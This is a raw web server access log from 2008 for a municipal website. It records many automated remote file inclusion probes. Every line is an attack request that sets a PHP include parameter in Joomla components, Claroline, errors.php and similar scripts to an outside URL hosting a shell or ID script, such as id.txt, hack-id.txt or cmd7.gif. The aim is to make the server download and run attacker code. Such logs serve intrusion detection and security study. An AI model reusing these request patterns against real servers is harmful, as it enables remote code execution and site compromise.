207.210.89.58 - - [01/Sep/2008:05:32:37 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:05:32:49 -0700] "GET /logs/access_080329.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:32:49 -0700] "GET /logs/access.log//claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:32:49 -0700] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:32:49 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:32:49 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:32:49 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:32:50 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:33:10 -0700] "GET /logs/access.log//claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:33:10 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:33:10 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:33:10 -0700] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:33:10 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:33:11 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
213.33.84.163 - - [01/Sep/2008:05:33:56 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nwstars.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:36:30 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:36:30 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:37:37 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:37:37 -0700] "GET //config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:37:37 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:37:55 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:38:17 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:38:17 -0700] "GET //config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:38:17 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:05:38:31 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:05:38:31 -0700] "GET //config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:05:38:31 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:38:38 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:05:38:48 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:05:40:38 -0700] "GET /!scanhttp://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:05:40:38 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:05:40:39 -0700] "GET //components/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:05:40:39 -0700] "GET /logs/!scanhttp://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:05:40:39 -0700] "GET /logs//components/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:05:40:40 -0700] "GET /logs/access_080401.log/!scanhttp://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:05:40:59 -0700] "GET /logs/access_080330.log/!scanhttp://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:05:44:04 -0700] "GET /logs/access_071231.log/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:44:39 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
207.58.167.158 - - [01/Sep/2008:05:48:29 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
207.58.167.158 - - [01/Sep/2008:05:48:29 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:51:00 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:54:08 -0700] "GET /logs/access.log///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:54:10 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:54:13 -0700] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:56:11 -0700] "GET /logs/access_080601.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.200.173.5 - - [01/Sep/2008:05:57:03 -0700] "GET //?path%5Bdocroot%5D=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 917 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "cityofarkadelphia.com"
193.200.173.5 - - [01/Sep/2008:05:57:03 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 4089 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:58:10 -0700] "GET /logs/access_080601.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:05:59:35 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:05:59:43 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:00:18 -0700] "GET /logs/access.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:00:19 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:00:19 -0700] "GET /logs//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:00:21 -0700] "GET /logs/access.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:00:21 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:00:22 -0700] "GET /logs//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:00:28 -0700] "GET /logs/access_080330.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:00:32 -0700] "GET /logs/access_080330.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
218.38.54.160 - - [01/Sep/2008:06:01:22 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:06:01:36 -0700] "GET /logs/access.log/errors.php?error=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:06:01:36 -0700] "GET /logs/access.log/errors.php?error=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:06:01:36 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:06:01:36 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:01:36 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:06:01:36 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:06:01:36 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:01:59 -0700] "GET /logs/access.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:01:59 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:02:00 -0700] "GET /logs//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:02:22 -0700] "GET /logs/access_080330.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:02:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:02:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:03:19 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:04:28 -0700] "GET //config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:04:38 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:04:58 -0700] "GET //config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:04:58 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:05:03 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:05:03 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:05:03 -0700] "GET //config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:05:15 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:05:19 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:05:33 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
67.225.157.1 - - [01/Sep/2008:06:05:48 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:06:06:45 -0700] "GET /logs/access.log//components/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:07:08 -0700] "GET /logs/access.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:07:09 -0700] "GET //atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:07:09 -0700] "GET /logs//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:07:47 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:07:48 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:07:55 -0700] "GET /logs/access_080330.log//atom.php5?page=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:09:35 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:09:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:09:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:10:37 -0700] "GET /logs/access_080701.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:10:40 -0700] "GET /logs/access_080701.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:10:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:10:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:10:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:10:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:13:09 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:13:12 -0700] "GET /logs/access.log//include/write.php?dir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:13:12 -0700] "GET //include/write.php?dir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:13:12 -0700] "GET /logs//include/write.php?dir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:06:13:24 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:13:37 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:13:37 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:06:13:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:13:44 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:13:45 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:13:52 -0700] "GET /logs/access.log//errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:13:52 -0700] "GET //errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:13:53 -0700] "GET /logs//errors.php?error=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:06:13:57 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
